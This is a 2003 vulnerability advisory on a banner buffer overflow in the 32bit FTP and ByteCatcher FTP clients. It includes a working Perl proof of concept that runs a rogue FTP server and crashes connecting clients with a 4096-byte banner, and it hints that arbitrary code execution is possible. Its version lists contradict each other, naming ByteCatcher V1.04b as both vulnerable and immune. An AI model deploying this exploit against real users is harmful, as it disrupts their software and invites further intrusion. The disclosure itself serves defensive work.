Banner Buffer Overflows found in Multiple FTP Clients Discovered by Dennis Rand ------------------------------------------------------------------------ -----[SUMMARY A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner. 32bit FTP Client has currently been downloaded 19,330 times from www.downloads.com ByteCatcher FTP Client has currently been downloaded 169,912 times from www.downloads.com -----[DETAILS Vulnerable systems: * 32bit FTP Client version p9.49.01 ByteCatcher FTP Client V1.04b Immune systems: * 32bit FTP p9.50.01 ByteCatcher FTP Client V1.04b It's possible to crash these FTP Clients by sending long (4096 bytes) FTP banner to it. The other more dangerous problem could be that this can be used to execute arbitrary code, on the users machine. The following transcript demonstrates a sample exploitation of the vulnerabilities, only to the point that we will kill the client, it is up to you to put in the evil evil code =) -----[EXPLOIT CODE #!/usr/bin/perl ###################################################### # # Affected systems: # 32bit FTP Client version p9.49.01 # ByteCatcher FTP Client V1.04b # Possible many other clients, got this problem to # # When FTP client connects to this server they will CRASH # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # # # # ####################################################### use IO::Socket; $port = "21"; $data = "a"; $num = "4096"; $buf .= $data x $num; $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n"; while ($client = $server->accept()) { print "Client connected.\n"; print "Attacking..."; print $client "$buf"; print "OK\n"; close($client); } -----[DETECTION 32bit FTP Client version p9.49.01 and ByteCatcher FTP Client V1.04b is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. -----[VENDOR RESPONSE We have fixed the problem, and a update is to be found on our site. -----[DISCLOSURE TIMELINE 04/01/2003 Found the Vulnerability. 04/01/2003 Author notified. 01/02/2003 Responses received 04/02/2003 Public Disclosure. -----[ADDITIONAL INFORMATION The vulnerability was discovered by Dennis Rand -----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.